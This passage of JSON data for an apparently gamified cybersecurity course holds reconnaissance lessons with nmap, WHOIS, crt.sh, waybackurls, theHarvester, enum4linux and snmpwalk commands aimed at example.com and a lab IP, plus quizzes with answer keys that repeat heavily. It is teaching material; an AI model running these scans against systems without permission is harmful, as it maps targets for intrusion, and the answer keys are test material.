accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"whois-intel","cat":"Reconnaissance","title":"WHOIS Intelligence","diff":1,"xp":50,"intro":"Domain registration data.","sections":[{"type":"text","content":"WHOIS reveals registrant info, dates, nameservers."},{"type":"code","lang":"bash","content":"whois example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"WHOIS provides?","opts":["Port info","Domain registration data","Vulnerabilities","Passwords"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"cert-trans","cat":"Reconnaissance","title":"Certificate Transparency","diff":1,"xp":75,"intro":"Mine CT logs.","sections":[{"type":"text","content":"CT logs record every SSL cert issued."},{"type":"code","lang":"bash","content":"curl -s 'https://crt.sh/?q=%25.example.com&output=json' | jq -r '.[].name_value'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"CT logs maintained by?","opts":["IANA","CAs (public)","ICANN","ISPs"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"wayback","cat":"Reconnaissance","title":"Wayback Machine","diff":1,"xp":75,"intro":"Historical web content.","sections":[{"type":"text","content":"Old pages may contain removed credentials or API keys."},{"type":"code","lang":"bash","content":"echo example.com | waybackurls | sort -u"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Wayback value?","opts":["Current vulns","Removed content still accessible","WAF bypass","Cracking"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"se-recon","cat":"Reconnaissance","title":"Social Engineering Recon","diff":1,"xp":75,"intro":"Gather human intelligence.","sections":[{"type":"text","content":"Employee names, email formats, org structure."},{"type":"code","lang":"bash","content":"theHarvester -d example.com -b google,linkedin"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SE recon goal?","opts":["Open ports","Info about people for attacks","SQLi","Cracking"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"net-map","cat":"Reconnaissance","title":"Network Mapping","diff":2,"xp":125,"intro":"Map topology and segments.","sections":[{"type":"text","content":"Identify subnets, routers, firewalls, attack paths."},{"type":"code","lang":"bash","content":"traceroute 10.10.10.1\nnmap -sn 10.10.10.0/24\narp-scan -l"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"nmap -sn does?","opts":["Port scan","Ping sweep","Service scan","OS detect"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"banner-grab","cat":"Reconnaissance","title":"Banner Grabbing","diff":1,"xp":50,"intro":"Identify service versions.","sections":[{"type":"text","content":"Services send identification strings revealing software."},{"type":"code","lang":"bash","content":"nc -v 10.10.10.1 22\ncurl -I http://10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Simplest banner tool?","opts":["nmap","netcat","wireshark","john"],"ans":1},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","User credentials"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"port-types","cat":"Reconnaissance","title":"Port Scan Types","diff":1,"xp":100,"intro":"TCP, SYN, UDP, exotic scans.","sections":[{"type":"text","content":"Different scans for different purposes."},{"type":"code","lang":"bash","content":"nmap -sT 10.10.10.1 # TCP connect\nnmap -sS 10.10.10.1 # SYN\nnmap -sU 10.10.10.1 # UDP"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Best for DNS/SNMP?","opts":["SYN","Connect","UDP","XMAS"],"ans":2},{"type":"quiz","q":"What is the main risk of active recon?","opts":["It's slow","The target can detect your scanning","It costs money","It requires admin access"],"ans":1},{"type":"quiz","q":"Which tool is best for subdomain enumeration?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"svc-enum","cat":"Reconnaissance","title":"Service Enumeration","diff":2,"xp":125,"intro":"Deep-dive into services.","sections":[{"type":"text","content":"Extract versions, configs, users, shares."},{"type":"code","lang":"bash","content":"enum4linux -a 10.10.10.1\nsnmpwalk -v2c -c public 10.10.10.1"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SMB enum tool?","opts":["nmap","enum4linux","hydra","curl"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike Network"],"ans":0},{"type":"quiz","q":"What does a WHOIS query reveal?","opts":["Server vulnerabilities","Domain registration details","Passwords","Network traffic"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable 